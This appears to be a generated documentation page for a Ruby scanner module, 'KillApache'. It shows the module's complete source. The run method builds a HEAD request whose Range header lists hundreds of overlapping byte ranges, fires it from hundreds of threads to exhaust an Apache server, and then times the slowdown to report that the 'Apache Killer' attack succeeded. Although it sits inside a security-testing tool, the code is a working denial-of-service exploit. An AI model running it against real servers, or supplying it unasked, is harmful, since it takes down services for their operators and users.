Module: KillApache

Defined in:: lib/bscan/modules/kill_apache.rb

Instance Method Summary collapse

Instance Method Details

#get_normal_response_time(host, port, req, proto, t) ⇒ `Object`

# File 'lib/bscan/modules/kill_apache.rb', line 167

def get_normal_response_time host,port,req,proto,t
  @threadinfo[t] ||= {}
  rsp = ''
  start = Time.now
  @bscan.activity[0]=true
  begin
    rsp = send_get_rsp host,port,req,proto,t,0
  rescue Exception => e
      @bscan.Log 1, "#{@mid}get_normal_response_time Exception : #{e.message}"
  end  
  [rsp,Time.now - start]
end

#read_response(s) ⇒ `Object`

# File 'lib/bscan/modules/kill_apache.rb', line 180

def read_response s
    rsp=''
    begin
      while (ch=s.sysread(1))
        rsp += ch
        if rsp =~ /Content-Length\s*:\s*(\d+)\r?\n$/i
          len = $1.to_i
          while (c=s.sysread(1))
            rsp += c
            if rsp[-4..-1] == "\r\n\r\n" || rsp[-2..-1] == "\n\n"
              rsp += s.sysread(len)
              break
            end  
          end
          break  
        end
      end
    rescue EOFError
    end
    rsp
end

#run(*args) ⇒ `Object`

# File 'lib/bscan/modules/kill_apache.rb', line 9

def run *args
  @bscan = args[0]
  @config ||= @bscan.bscan_config
  @bscan.activity[0]=true

  @prop_pref = 'bscan.kill_apache.'
  @prop_pref += args[2] + '.' if args[2] && args[2].length > 0
  @mid = args[2]?"KillApache.#{args[2]}.":'KillApache.' 

  proto = @config[prop('protocol')] 
  proto ||= 'http'
  
  threads = @config[prop('threads')]
  threads ||= '500'
  threads = threads.to_i

  rtf = @config[prop('response_time_factor')]
  rtf ||= '10'
  rtf = rtf.to_i
  rpt = @config[prop('req_per_thread')]
  rpt ||= '1'
  rpt = rpt.to_i
  @rto = @config[prop('read_timeout')]
  @rto ||= '10'
  @rto = @rto.to_i
  ranges = @config[prop('range_nbr')]
  ranges ||= '500'
  ranges = ranges.to_i
  host = @config[prop('hostport')]
  raise "#{@mid}run parameter #{prop 'hostport'} is missing, exiting" if not host
  host,port = host.split(':')
  port = (proto=='http'?80:443) if not port
  
  req = "HEAD / HTTP/1.1\r\n"+
        "Host: #{host}:#{port}\r\n"+
        "Range:bytes=0-@@@\r\n"+
        "Accept-Encoding: gzip\r\n"+
        "Connection: close\r\n\r\n"
  
  nreq = req.sub /Range:bytes=@@@\r\n/, ""
  inj = ''
  start = 5

  ranges.times do |t|
    inj += ",#{start}-#{t}"
  end  
  req.sub!(/@@@/,inj)

  @bscan.Log 2, "#{@mid}run input: #{threads} #{rpt} #{rtf} #{host} #{port}\n#{req}"

  @threadinfo = {}
  threads.times do |t|
    @threadinfo[t] = {}
    for con in 0..rpt-1
      @threadinfo[t][con]=nil # need to add keys if they are not there yet
    end
  end
     
  trg,host,port = get_url_host_port req,proto    
  
  @infom ||= Mutex.new
  
  rsp,nrt = get_normal_response_time(host, port, nreq, proto, threads)

  @bscan.Log 2, "#{@mid}run normal rt: #{nrt} \n#{rsp}"
 
     # Monitoring thread
  Thread.new do
      maxtime=0
      while (true)
        begin 
          sleep 2.5  
          rsp,rt = get_normal_response_time(host, port, nreq, proto, threads)
          @bscan.Log 2, "#{@mid}run monitor rt: #{rt}\n#{rsp}"
          maxtime = rt if rt > nrt*rtf && rt > maxtime     
          ex = true
          tnum = 0
          cnum = 0
          @threadinfo.each_pair do  |t,c|
            inc_t = false
            if c
              c.each_key do |k|
                if c[k] == 1
                  cnum += 1 
                  inc_t = true
                  ex = false
                end
              end
            end
            tnum += 1 if inc_t
          end
          @bscan.Log 2, "#{@mid}run monitor t/c : #{tnum}/#{cnum}, will sleep 5 sec"
          break if ex
        rescue Exception => e
           @bscan.Log 1, "#{@mid}run Exception: #{e.message}"
           @bscan.Log 1, e.backtrace.join("\n")
        end
      end
      @bscan.Log 1, "#{@mid}run exiting monitor: #{maxtime}"
      if maxtime > 0
        issue = Issue.new "#{@mid.chop}: Apache Killer succeeded", trg, "Medium", "Firm", req, rsp, 
        "Response time under atack was #{maxtime}, which is #{maxtime/nrt} times bigger than normal response time: #{nrt}"
          @bscan.write_issue_state issue
        end  
    end
 
   threads.times do |t|
      Thread.new do
        begin
          @bscan.Log 2, "#{@mid}run thread: #{t} #{rpt}"
        for con in 0..rpt-1
          send_get_rsp host,port,req,proto,t,con
        end
      rescue Exception => e
         @bscan.Log 1, "#{@mid}run Exception: #{e.message}"
         @bscan.Log 1, e.backtrace.join("\n")
         Thread.current.exit
      end
    end
 end
end

#send_get_rsp(host, port, req, proto, t, c) ⇒ `Object`

# File 'lib/bscan/modules/kill_apache.rb', line 131

def send_get_rsp host,port,req,proto,t,c
 @bscan.activity[0]=true
 @threadinfo[t][c] = 1
 rsp =''
 s=nil
 begin
  timeout(@rto) do
    s = TCPSocket.new(host, port)
    if (proto =~ /https/i)
      ctx = OpenSSL::SSL::SSLContext.new
      ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE 
      s = OpenSSL::SSL::SSLSocket.new(s, ctx)
      s.connect
    end
    l = s.syswrite(req)
    raise "only #{l} bytes out of #{req.length} written #{t} #{req}" if l != req.length
    rsp = read_response s
    @bscan.Log 2, "#{@mid}send_get_rsp succeeded for #{t} #{rsp}"
  end
 rescue Exception => e
    @bscan.Log 1, "#{@mid}send_get_rsp failed for #{t} Exception: #{e.message}"
    @bscan.Log 1, e.backtrace.join("\n")
    @threadinfo[t][c] = nil
 end

 begin
    s.close if s
  rescue  Exception => e
    @bscan.Log 1, "#{@mid}send_get_rsp close for #{t} Exception:  #{e.message}"
 end  
 @threadinfo[t][c] = 0

 rsp
end

Module: KillApache

Instance Method Summary collapse

Instance Method Details

#get_normal_response_time(host, port, req, proto, t) ⇒ Object

#read_response(s) ⇒ Object

#run(*args) ⇒ Object

#send_get_rsp(host, port, req, proto, t, c) ⇒ Object

#get_normal_response_time(host, port, req, proto, t) ⇒ `Object`

#read_response(s) ⇒ `Object`

#run(*args) ⇒ `Object`

#send_get_rsp(host, port, req, proto, t, c) ⇒ `Object`